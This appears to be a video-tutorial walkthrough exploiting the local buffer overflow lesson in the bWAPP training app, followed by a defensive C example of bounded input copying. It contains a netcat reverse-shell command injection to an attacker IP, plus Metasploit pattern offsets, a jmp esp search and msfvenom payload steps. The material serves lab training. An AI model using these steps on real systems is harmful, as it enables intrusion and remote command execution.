Buffer Overflow (Local) - Low Security Level Solution:

Step 1.
Give a movie name that is part of the current bWAPP database as input and check the output (e.g. Hulk, Iron Man etc.).
Give a movie name that is not part of the database and check the output (e.g. Time).
Check the source code of the lesson (please follow the steps as shown in the video).
Open the bof_1.php document.
From the source code we understand that the title is passed straight to the app as a command-line argument.

Step 2. To get the shell the easy way, use the command below as shown in the video.

    $(nc -e /bin/bash 10.0.2.4 4444)

*Change the IP address to your BeeBox IP.
Check the output.

Step 3. To get the shell the hard way
Check the Hint given on the lesson page.
Let us crash the application by giving it a string from Metasploit's pattern_create.rb.

a. Go to the command prompt and give the command:

    locate pattern_create.rb

Output: you will get the path.

    /usr/share/metasploit-framework/tools/exploit/pattern_create.rb

b. Go to the folder where the pattern_create.rb file is located. Use the commands:

    cd /usr/share/metasploit-framework/tools/exploit/
    ls -l

You can see pattern_create.rb here.
Now execute the file pattern_create.rb. Commands:

    sudo ./pattern_create.rb        (*give password if necessary)
    sudo ./pattern_create.rb -h
    sudo ./pattern_create.rb -l 360

Executing the last command generates the pattern output. Save the output on the BeeBox machine.

Step 4. Go to the BeeBox
Open a command prompt and go to the folder path: /var/www/html/bWAPP/apps
Use the command below:

    gdb --args ./movie_search "the output which you have saved"

(Please refer to the video.)
Note: I have already saved the command in BeeBox and am using it directly.
Use the commands below in BeeBox (gdb):

    run
    info registers

Note that the eip register value has been overwritten.

Step 5. On your local machine
Give the command below:

    ./pattern_offset.rb -q 0x41386c41

Check the output:

    [*] Exact match at offset 354

In your BeeBox give the command below (gdb):

    x/100cb $esp

Check the output - l 9 A m ...
On your local machine give the command below:

    ./pattern_offset.rb -q l9Am

Check the output:

    [*] Exact match at offset 358

In BeeBox open a new command prompt with path /var/www/bWAPP/apps# and use the command:

    objdump -D ./movie_search | grep jmp.*esp

Step 6. On your local machine generate the payload with the command below.
Note: As angled brackets are not allowed in a YouTube description, the angled bracket is replaced with ); kindly make the necessary change.

    sudo msfvenom -p linux/x86/exec CMD=/bin/ps -b '\x00' -e x86/opt_sub -f raw ) /home/kali/Desktop/bofpayload.txt

Give the password (*if necessary) and wait patiently until the payload is generated.
Open a new command prompt, go to the location where the file is saved, and check the generated payload with the command:

    cat bofpayload.txt

Regenerate the payload with the command below:

    (echo -n \'; cat /home/kali/Desktop/bofpayload.txt; echo -n \';) | perl -pe's/(.)/sprintf("%%%02X",ord($1))/seg'

Step 7. Go to the lesson page and check the HINT.
Let's use the HINT and make the exploit.
Follow the steps as shown in the video.

Step 8. Start BurpSuite
Turn on the proxy.
Go to the lesson page, give any input of your choice in the search box and click on the Search button.
Go to BurpSuite and replace the given input with our exploit.
Forward the request.
Go to the lesson page and check the output.
Explore the lesson further to get the reverse shell (not covered in this video).

PseudoTime
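
The walkthrough works because the title reaches the binary unchecked and is then copied into a fixed-size stack buffer. The C sketch below is an added example, not code from the video or from bWAPP: it sets that unsafe copy beside a bounded, allow-listed one. `TITLE_MAX`, the allow-list and every function name are assumptions.

```c
/* Added example: names and TITLE_MAX are assumptions, not bWAPP source. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define TITLE_MAX 64   /* assumed size; the real buffer size is not on the page */

/* Unsafe pattern: the argument is copied with no length check, so a
   360-byte title writes past buf and over the saved return address. */
void lookup_unsafe(const char *title) {
    char buf[TITLE_MAX];
    strcpy(buf, title);
    printf("searching for %s\n", buf);
}

/* Hardened copy: returns 0 and fills dst, or -1 if the title is NULL,
   empty, too long for dst, or has a byte outside the allow-list. */
int copy_title(char *dst, size_t dstsz, const char *title) {
    size_t n = 0;
    if (title == NULL || dst == NULL || dstsz == 0) return -1;
    while (n < dstsz && title[n] != '\0') n++;   /* bounded length scan */
    if (n == 0 || n == dstsz) return -1;         /* reject, never truncate */
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)title[i];
        if (!isalnum(c) && c != ' ' && c != '-' && c != ':') return -1;
    }
    memcpy(dst, title, n + 1);                   /* n + 1 <= dstsz, copies NUL */
    return 0;
}

/* Runs copy_title on one title with a local TITLE_MAX buffer. */
int check_title(const char *title) {
    char out[TITLE_MAX];
    return copy_title(out, sizeof out, title);
}

/* Builds a constructed title of len 'A' bytes and returns the verdict. */
int check_len(size_t len) {
    char in[512];
    if (len >= sizeof in) return -1;
    memset(in, 'A', len);
    in[len] = '\0';
    return check_title(in);
}

int main(void) {
    printf("Iron Man -> %d\n", check_title("Iron Man"));
    printf("$(true)  -> %d\n", check_title("$(true)"));
    printf("360 x A  -> %d\n", check_len(360));
    return 0;
}
```

The allow-list protects only the binary: the `$(...)` substitution in Step 2 is expanded by the shell before the binary starts, so the PHP caller also has to quote the argument (for example with `escapeshellarg()`) or avoid the shell entirely.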